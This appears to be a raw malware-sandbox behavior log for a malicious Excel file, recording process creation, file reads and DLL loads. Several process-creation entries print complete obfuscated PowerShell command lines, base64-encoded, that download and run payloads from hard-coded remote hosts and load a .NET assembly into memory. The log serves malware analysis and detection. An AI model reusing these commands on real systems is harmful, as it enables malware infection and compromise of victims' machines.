              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .........~.....}..w.............:M......:.l......L.....(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................~.............0........Wl.....}..w....x.......@EE.....^...............(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ..................~......................Wl.....}..w....x.......@EE.....^...............(.P.....................................................Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....P7................D.....P7......X7................D......3D.....8...............P7..............Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(D.......................m.....}..w......m.......D.......D......1D.....(.P.....................8...............................Jump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: PI-02911202409#.xla.xlsxVirustotal: Detection: 9%
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfoseJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
